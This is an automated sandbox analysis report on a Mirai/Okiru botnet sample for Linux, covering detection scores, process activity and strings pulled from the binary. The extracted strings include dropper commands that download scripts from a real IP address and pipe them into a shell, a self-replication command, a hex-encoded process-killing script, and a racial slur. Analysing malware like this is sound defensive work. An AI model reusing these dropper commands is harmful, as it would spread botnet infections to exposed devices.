Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
m68k.nn.elf

Overview

General Information

Sample name:m68k.nn.elf
Analysis ID:1579223
MD5:56ee2748af054f2c4cb5cf6be7a309af
SHA1:194c6758f9d23a1c90ba14ef720be47d8940eace
SHA256:0ffd845154c04aeace9d2ac859599c813962ac060cc5f3dcf8fdce6cc3842b99
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru
Score:68
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Sample deletes itself
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1579223
Start date and time:2024-12-21 05:31:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 37s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:m68k.nn.elf
Detection:MAL
Classification:mal68.troj.evad.linELF@0/2@0/0
Command:/tmp/m68k.nn.elf
PID:6239
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • m68k.nn.elf (PID: 6239, Parent: 6164, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/m68k.nn.elf
  • udisksd New Fork (PID: 6251, Parent: 799)
  • dumpe2fs (PID: 6251, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6295, Parent: 799)
  • dumpe2fs (PID: 6295, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
m68k.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    m68k.nn.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      6239.1.00007fb9b4001000.00007fb9b401c000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
        6239.1.00007fb9b4001000.00007fb9b401c000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          Process Memory Space: m68k.nn.elf PID: 6239JoeSecurity_OkiruYara detected OkiruJoe Security
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: m68k.nn.elfVirustotal: Detection: 32%Perma Link
            Source: m68k.nn.elfReversingLabs: Detection: 34%
            Source: m68k.nn.elfString: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /.socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/login94.156.227.234malloc[start_pid_hopping] Failed to clone: %s
            Source: m68k.nn.elfString: incorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh94.156.227.233GET /dlr. HTTP/1.0
            Source: /tmp/m68k.nn.elf (PID: 6239)Socket: 0.0.0.0:38242Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
            Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
            Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
            Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
            Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
            Source: m68k.nn.elfString found in binary or memory: http://94.156.227.233/
            Source: m68k.nn.elfString found in binary or memory: http://94.156.227.233/curl.sh
            Source: m68k.nn.elfString found in binary or memory: http://94.156.227.233/lol.sh
            Source: m68k.nn.elfString found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
            Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /.socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/
            Source: Initial sampleString containing 'busybox' found: usage: busybox
            Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
            Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
            Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
            Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;
            Source: Initial sampleString containing 'busybox' found: /bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;
            Source: Initial sampleString containing 'busybox' found: /bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;
            Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
            Source: Initial sampleString containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh94.156.227.233GET /dlr. HTTP/1.0
            Source: Initial sampleString containing 'busybox' found: .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: classification engineClassification label: mal68.troj.evad.linELF@0/2@0/0

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: /tmp/m68k.nn.elf (PID: 6239)File: /tmp/m68k.nn.elfJump to behavior
            Source: /tmp/m68k.nn.elf (PID: 6239)Queries kernel information via 'uname': Jump to behavior
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-microblazeel
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/luit0!/usr/bin/chown1/usr/bin/qemu-ppc64k/s10!/usr/bin/xcutsel!/usr/bin/www-browser1/usr/bin/debconf-shows10!/usr/bin/paplay0!/usr/bin/hp-logcapture1/usr/bin/systemd-id12810!/usr/bin/sudoedit!/usr/bin/tracepath1/usr/bin/mono-configuration-crypto9
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: !/usr/bin/qemu-hppa!/usr/bin/arecord1/usr/bin/watchgnupgk/s10!/usr/bin/xmodmap!/usr/bin/ilasm1
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc32plus
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-riscv32
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: !/usr/bin/byobu0!/usr/bin/pod2man1/usr/bin/ed_U/m68k/s10!/usr/bin/runcon0!/usr/bin/sudo1/usr/bin/pphs/m68k/s10!/usr/bin/sg_format!/usr/bin/usb-devices1/usr/bin/qemu-or1k8k/10!/usr/bin/colcrt0!/usr/bin/gnome-software1/usr/bin/gdk-pixbuf-thumbnailer
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/gdialog1/usr/bin/vmware-xferlogs`!/usr/bin/volname1/usr/bin/x86_64-linux-gnu-elfedit
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips64el
            Source: m68k.nn.elf, 6239.1.00007fff26c9a000.00007fff26cbb000.rw-.sdmpBinary or memory string: /qemu-open.XXXXX
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: !/usr/bin/sginfo0!/usr/bin/qemu-ppc1/usr/bin/foo2lava-wrapper
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/nisdomainname!/usr/bin/7zr1/usr/bin/xfce4-notifyd-config0!/usr/bin/qemu-i386!/usr/bin/cloud-init1/usr/bin/hp-clean68k/s10!/usr/bin/rygel01/usr/bin/xfdesktop-settings1/usr/bin/inputattach/s10!/usr/bin/hp-check!/usr/bin/nm-online1/usr/bin/lzcat/m68k/s10!/usr/bin/vdir0!/usr/bin/sg_get_config1
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-alpha
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: !/tmp/.font-unix0!/proc/4510/exe!/run/vmware_U/m68k/tm!/run/initramfs/m68k/ru1/usr/bin/xfce4-find-cursor
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-s390x
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/gpg-wks-server!/usr/bin/ntfsusermap1/usr/bin/syndaemon8k/s10!/usr/bin/qemu-mips!/usr/bin/sg_opcodes1/usr/bin/x86_64-linux-gnu-gprof
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4eb
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/m68k
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/stty0!/usr/bin/setarch1/usr/bin/gnome-helpk/s10!/usr/bin/strings!/usr/bin/libreoffice1/usr/bin/ntfsmove68k/s10!/usr/bin/byobu-janitor!/usr/bin/lzegrep1/usr/bin/xdg-icon-resource0!/usr/bin/host0!/usr/bin/pax11publish1/usr/bin/ps2txt/m68k/s10!/usr/bin/soffice!/usr/bin/ucs2any1/usr/bin/xfce4-popup-windowmenu0!/usr/bin/kmod0!/usr/bin/koi8rxterm1/usr/bin/alsamixer8k/s10!/usr/bin/pager0!/usr/bin/qemu-riscv321p
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U1/usr/bin/vmware-vmblock-fuse
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/vmware-hgfsclient
            Source: m68k.nn.elf, 6239.1.00007fff26c9a000.00007fff26cbb000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/gtk-launch!/usr/bin/vmhgfs-fuseU1@y
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-aarch64
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/usr/bin/qemu-mipselpB
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/byobu-ctrl-a!/usr/bin/Xwayland!/usr/bin/vmwarectrlk/us
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/fc-pattern!/usr/bin/flock1/usr/bin/pkg-configk/10!/usr/bin/fprintd-delete!/usr/bin/startxfce41/usr/bin/qemu-sparc32plus
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips64el1/usr/bin/linkiccm68k/s10!/usr/bin/gjs0!/usr/bin/ntfsfallocate10f
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/install-info!/usr/bin/ssh-keygen!/usr/bin/systemd-umount1/usr/bin/vmware-vgauth-cmd0!/usr/bin/calibrate_ppa
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/objdump!/usr/bin/lspci1/usr/bin/jsonschemak/s10!/usr/bin/padsp0!/usr/bin/unpack2001/usr/bin/select-editors10!/usr/bin/btrfs-image!/usr/bin/qemu-riscv641/usr/bin/preconvm68k/10!/usr/bin/sg_read_buffer!/usr/bin/diff31/usr/bin/unattended-upgrade
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-nios2
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /m68k/usr/bin/qemu-mipsel
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-microblaze
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: !/usr/bin/ddstdecode1/usr/bin/qemu-aarch64_be1
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-cris
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: !/usr/bin/sg_rmsn!/var/run/vmware1/usr/bin/xfce4-popup-places
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc64
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_Uoopsie-preferencesP!/usr/bin/caspol1/usr/bin/rmiregistry/s10!/usr/bin/qemu-ppc64le!/usr/bin/info1/usr/bin/light-locker-command0!/usr/bin/tty0!/usr/bin/psfgettable1/usr/bin/desktop-file-edit
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: !/var/run/cloud-init1/usr/bin/dtd2rngm68k/a10!/usr/bin/notify-send!/var/run/NetworkManager1/usr/bin/qemu-microblazeel0!/usr/bin/pdfdetach!/var/run/systemd1/usr/bin/ipcs/m68k/a10!/usr/bin/localectl!/var/run/network1/usr/bin/xfce4-popup-notes0!/usr/bin/nohup0!/var/run/blkid1/usr/bin/scanimage8k/a10!/usr/bin/apt-key!/var/run/lvm1/usr/bin/lpq
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsn32
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc64le
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/vmware-toolbox-cmd
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-hppa
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /var/run/vmware
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/usr/bin/qemu-cris
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/vmware-xferlogs
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/sbverify!/usr/bin/qemu-xtensa1/usr/bin/mdoc-assembles10!/usr/bin/atrm0!/usr/bin/pedump1/usr/bin/lexgrogm68k/s10!/usr/bin/dirmngr!/usr/bin/pkexec1/usr/bin/gnome-power-statistics
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/qemu-mipsn32!/usr/bin/hd1PL
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips64
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_UGeneralName!/usr/bin/vmtoolsd
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/dev/vmci
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: !/usr/bin/mdbrebase!/var/run/multipathd.pid1/usr/bin/setfaclm68k/a10!/usr/bin/sensible-pager!/var/run/console-setup1/usr/bin/avahi-resolve-address0!/usr/bin/base640!/var/run/log1/usr/bin/qemu-xtensaeb10!/usr/bin/mono-xmltool!/var/run/tmpfiles.d1/usr/bin/gimp-console-2.10
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /m68k/usr/bin/qemu-alpha
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /m68k/usr/bin/qemu-sh4eb
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/10 /usr/bin/xfce4-notes!/usr/bin/qemu-sparc641/usr/bin/linux-boot-prober
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/vmware-checkvm
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /m68k/usr/bin/qemu-cris
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/vmware-vgauth-smoketest
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/mt-gnu0!/usr/bin/sg_rdac1/usr/bin/x86_64-linux-gnu-cpp-90!/usr/bin/mount0!/usr/bin/ciptool1/usr/bin/Thunar/m68k/s10!/usr/bin/gpgtar0!/usr/bin/qemu-tilegx1/usr/bin/xstdcmap68k/s10!/usr/bin/ssh-keyscan!/usr/bin/run-parts1/usr/bin/sg_sat_read_gplog0!/usr/bin/cli-gacutil!/usr/bin/cli-csc1/usr/bin/run-one-constantly
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/cd-it80!/usr/bin/jexec!/usr/bin/qemu-mipsel/us
            Source: m68k.nn.elf, 6239.1.00007fff26c9a000.00007fff26cbb000.rw-.sdmpBinary or memory string: t:`_U/tmp/qemu-open.lZFn0Y-
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/arm2hpdl!/usr/bin/ua1/usr/bin/qemu-aarch64s10!/usr/bin/col50!/usr/bin/bundle2.71/usr/bin/sg_test_rwbufs10!/usr/bin/deallocvt!/usr/bin/dpkg-query!/usr/bin/ypdomainnameus1
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc64abi32
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/getopt0!/usr/bin/precat1/usr/bin/sgen/m68k/s10!/usr/bin/gresource!/usr/bin/gzexe1/usr/bin/du_U/m68k/s10!/usr/bin/bashbug!/usr/bin/eatmydata!/usr/bin/qemu-x86_64/us1`>
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/usr/bin/qemu-alpha
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/vmware-vgauth-cmd
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/usr/bin/qemu-sh4eb
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/vmware-vmblock-fuse
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-x86_64
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/qemu-mipsn32el!/usr/bin/sg_read!/usr/bin/xfhelp4m68k/us
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U!/etc/qemu-binfmt/m68k
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/dc0!/usr/bin/apt1/usr/bin/bzmore/m68k/s10!/usr/bin/xinit0!/usr/bin/mkisofs1/usr/bin/systemd-run/s10!/usr/bin/pasuspender!/usr/bin/qemu-m68k1/usr/bin/kmodsign68k/s10!/usr/bin/dumpkeys1/usr/bin/md5sum.textutils1/usr/bin/gst-inspect-1.00!/usr/bin/ntfsfix!/usr/bin/phar7.41/usr/bin/byobu-status-detail0!/usr/bin/zip0!/usr/bin/lomath1/usr/bin/Xb_U/m68k/s10!/usr/bin/installvst!/usr/bin/rgrep1
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/ssh0!/usr/bin/ginstall-info1/usr/bin/rtstat/m68k/s10!/usr/bin/sdptool1/usr/bin/scsi_logging_level1/usr/bin/kbd_mode68k/s10!/usr/bin/qemu-sh4!/usr/bin/getkeycodes1/usr/bin/mdoc-update/s10!/usr/bin/pstree0!/usr/bin/lnstat1@
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-crisb_UQ0
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/m68k/usr/libexec/evolution-data-server/evolution-alarm-notify
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /m68k/dev/vmci
